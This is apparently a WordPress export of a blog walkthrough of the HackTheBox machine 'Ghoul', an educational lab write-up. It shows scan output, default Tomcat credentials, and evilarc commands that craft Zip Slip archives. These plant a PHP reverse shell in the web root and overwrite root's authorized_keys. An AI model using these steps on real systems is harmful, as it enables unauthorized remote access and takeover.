{"id":542,"date":"2021-01-05T11:32:37","date_gmt":"2021-01-05T11:32:37","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=542"},"modified":"2021-01-05T14:50:11","modified_gmt":"2021-01-05T14:50:11","slug":"ghoul-hackthebox-walkthrough-part-1","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/ghoul-hackthebox-walkthrough-part-1\/","title":{"rendered":"Ghoul Hackthebox walkthrough – Part 1"},"content":{"rendered":"\n

Hey folks! This is Shreya. Today I’ll be walking you through one of the hard Linux machines of hackthebox named Ghoul.<\/p>\n\n\n\n

Summary<\/h1>\n\n\n\n

As it is a hard machine, it covers a lots of new concepts and the journey will be no less than a rollercoaster ride. The initial foothold it obtained via a zipslip vulnerability in tomcat. Then a bit of enumeration gives the user. Getting the root requires to exploit the git gogs vulnerability. For that ssh port forwarding has to be done.<\/p>\n\n\n\n

That was the gist. But as I proceed, you will realize it to be a long one but totally worth it.<\/p>\n\n\n\n

With all that being said, let’s get started.<\/p>\n\n\n\n

Recon<\/h1>\n\n\n\n

Starting with an nmap scan, I found a ssh and http are open on 2 ports, with different versions of ubuntu (ubuntu0.1 and ubuntu0.2). Therefore a simple guess would be presence of docker.<\/p>\n\n\n\n

# Nmap 7.80 scan initiated Sat Nov 28 03:54:47 2020 as: nmap -sC -sV -oA ghoul.nmap 10.10.10.101\nNmap scan report for 10.10.10.101\nHost is up (0.14s latency).\nNot shown: 996 closed ports\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c1:1c:4b:0c:c6:de:ae:99:49:15:9e:f9:bc:80:d2:3f (RSA)\n|_  256 a8:21:59:7d:4c:e7:97:ad:78:51:da:e5:f0:f9:ab:7d (ECDSA)\n80\/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Aogiri Tree\n2222\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 63:59:8b:4f:8d:0a:e1:15:44:14:57:27:e7:af:fb:3b (RSA)\n|   256 8c:8b:a0:a8:85:10:3d:27:07:51:29:ad:9b:ec:57:e3 (ECDSA)\n|_  256 9a:f5:31:4b:80:11:89:26:59:61:95:ff:5c:68:bc:a7 (ED25519)\n8080\/tcp open  http    Apache Tomcat\/Coyote JSP engine 1.1\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\\\x0D\n|_  Basic realm=Aogiri\n|_http-server-header: Apache-Coyote\/1.1\n|_http-title: Apache Tomcat\/7.0.88 - Error report\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at <https:\/\/nmap.org\/submit\/> .\n# Nmap done at Sat Nov 28 03:55:04 2020 -- 1 IP address (1 host up) scanned in 17.12 seconds\n<\/pre>\n\n\n\n
Since http is open, I ran a dirbuster scan on both the open ports with the defaut wordlist and got a whole bunch of results.<\/p>\n\n\n\n
INFO: Created user preferences directory.\nStarting OWASP DirBuster 1.0-RC1\nStarting dir\/file list based brute forcing\nFile found: \/index.html - 200\nDir found: \/ - 200\nDir found: \/images\/ - 403\nFile found: \/blog.html - 200\nDir found: \/archives\/ - 403\nFile found: \/contact.html - 200\nDir found: \/js\/ - 403\nDir found: \/icons\/ - 403\nFile found: \/js\/jquery.js - 200\nFile found: \/js\/touchTouch.jquery.js - 200\nFile found: \/js\/jquery-migrate-1.2.1.js - 200\nFile found: \/js\/script.js - 200\nFile found: \/js\/camera.js - 200\nFile found: \/js\/jquery.stellar.js - 200\nFile found: \/js\/TMForm.js - 200\nFile found: \/js\/modal.js - 200\nDir found: \/uploads\/ - 403\nDir found: \/users\/ - 302\nFile found: \/users\/index.php - 302\nFile found: \/users\/login.php - 200\nDir found: \/css\/ - 403\nDir found: \/users\/css\/ - 403\nDir found: \/icons\/small\/ - 403\nFile found: \/icons\/README.html - 200\nFile found: \/users\/logout.php - 302\nFile found: \/secret.php - 200\n<\/pre>\n\n\n\n
The index page looked something like this<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Secret.php<\/strong> revealed something interesting. It was sort of a leaked chat.<\/p>\n\n\n\n
http:\/\/10.10.10.101\/secret.php<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I tried going to http:\/\/10.10.10.10<\/a>1:8080 and it displayed a login page. From the results obtained from the map scan, we know that tomcat is running . Luckily the admin:admin creds works and got me to a landing page.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The landing page had an option to upload image, zip<\/strong>. I tried out uploading malicious files in image upload but it didn’t really work out.<\/p>\n\n\n\n
Zip Slip Vulnerability<\/h2>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Then i realized that tomcat is running so i checked for vulnerabilites around that version using searchsploit. And I found the zip slip vulnerability for that version of tomcat. https:\/\/snyk.io\/research\/zip-slip-vulnerability<\/a><\/p>\n\n\n\n
This vulnerability allowed for directory traversal if a malicious zip file gets extracted by the sever. The extracted files can also overwrite the existing ones and hence gives full control to the attacker.<\/p><\/blockquote>\n\n\n\n
I found a github repository evilarc used for creating malicious zip files.<\/p>\n\n\n\n
python evilarc.py -o unix -p var\/www\/html \/root\/Desktop\/hackthebox\/ghoul\/php-reverse-shell.php\npython evilarc.py -o unix -p var\/www\/html \/root\/Desktop\/hackthebox\/ghoul\/test.php\n<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
In the image above, a malicious zip file (evil.zip) is created. Upload evil.zip and whenever it gets extracted, it will store php-reverse-shell.php in the root directory of the server.<\/p>\n\n\n\n
The files can be placed anywhere on the server. For example, the attacker can overwrite the existing ssh keys for any user.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So our shell is successfully uploaded.<\/p>\n\n\n\n
Lets grab the reverse shell.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
www-data@Aogiri:\/etc\/ssh$ ssh-keygen -l -E md5 -f ssh_host_rsa_key.pub\n2048 MD5:c1:1c:4b:0c:c6:de:ae:99:49:15:9e:f9:bc:80:d2:3f root@0c2089ad028d (RSA)\n<\/pre>\n\n\n\n
This is the same md5 hash that we found in the nmap scan (of ssh). As there was ssh open on 2 ports.<\/p>\n\n\n\n
www-data@Aogiri:\/etc\/ssh$ netstat -alnp | grep LIST\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\ntcp        0      0 127.0.0.1:8005          0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp        0      0 127.0.0.11:34581        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::22                   :::*                    LISTEN      -                   \nunix  2      [ ACC ]     STREAM     LISTENING     47019    -                    \/var\/run\/supervisor.sock.1\n\nwww-data@Aogiri:\/etc\/ssh$ ps -ef | grep tomcat\nroot         15      1  0 08:42 ?        00:00:42 \/usr\/bin\/java -Djava.util.logging.config.file=\/usr\/share\/tomcat7\/conf\/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Dignore.endorsed.dirs= -classpath \/usr\/share\/tomcat7\/bin\/bootstrap.jar:\/usr\/share\/tomcat7\/bin\/tomcat-juli.jar \n-Dcatalina.base=\/usr\/share\/tomcat7 \n-Dcatalina.home=\/usr\/share\/tomcat7 -Djava.io.tmpdir=\/usr\/share\/tomcat7\/temp org.apache.catalina.startup.Bootstrap start\n<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Like I uploaded the php-reverse-shell, ssh-keys can also be overwritten and one can get logged in as root directly.<\/p>\n\n\n\n
The unintended way to root<\/h2>\n\n\n\n
One can generate ssh keys with ssh-keygen on the local machine and rename the key.pub to authorized_keys. Now we can upload authorized_keys file to the destination server on the \/root\/.ssh folder.  This is gonna overwrite the existing authorized_keys file if any. <\/p>\n\n\n\n
ssh-keygen -f ghoul
mv ghoul.pub authorized_keys
cd \/opt\/evilarc\/
python evilarc.py -o unix -d 2 -p root\/.ssh\/ authorized_keys<\/pre>\n\n\n\n
This again creates an evil.zip<\/a> that will be uploaded again<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The evil.zip<\/a> is successfully uploaded. Lets run the ssh command as we have the private key (that was generated with ssh-keygen)!!!<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Doing an ifconfig on the box revelas that we are inside a docker. So the initial intuition from 2 versions of ubuntu lead us to the correct path of dockers.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So this was the unintended way to directly obtain the root (this is not where root.txt lives).<\/p>\n\n\n\n
The intended way to user.txt<\/h1>\n\n\n\n
When logged in as www-data, perform enumeration with linenum.sh. But see here was a file login.txt that is leaking password for the user kaneki. <\/p>\n\n\n\n
I tried to ssh with the creds but didnt worked. So took a note and moved ahead.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Since tomcat is installed, I thought of having a look at tomcat-users.xml for passwords<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And yes i found it too. Just, It wasnt of any use as of now!<\/p>\n\n\n\n
In enumenration, I found a backup folder in \/var. <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It has the private keys with the passphrase. Its really a bad idea to bruteforce passphrase for this key! Why? Because the passphrase was leaked in the secret.php file that we looked upon earlier (ILoveTouka <3). And it is not really possible to crack with john or anything else.<\/p>\n\n\n\n
And if you are wondering how the hell anyone can guess that, I would say its the notes that makes things bit simpler \ud83d\ude42 <\/p>\n\n\n\n
Now ssh into the box with user kaneki and you get the user.txt<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So that was the user part! Just so that you all are not overwhemled with the length of blog, I have covered the privilege escalation in the follow-up post<\/strong><\/a><\/span>.<\/p>\n\n\n\n
I hope you enjoyed the journey till now!<\/p>\n\n\n\n
See you in the next one! Until then happy hunting \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"
Ghould is a hard linux machine from hackthebox. Find the machine in the retired section.<\/p>\n","protected":false},"author":1,"featured_media":570,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,228],"tags":[267,263,265,54,71,269,146,147,268,266,264],"class_list":["post-542","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux-2","tag-evilarc","tag-ghoul","tag-gogs-exploit","tag-htb","tag-linux","tag-secret-php","tag-ssh","tag-ssh-keygen","tag-user-txt","tag-zip-upload","tag-zipslip","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/542"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=542"}],"version-history":[{"count":11,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/542\/revisions"}],"predecessor-version":[{"id":606,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/542\/revisions\/606"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/570"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=542"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}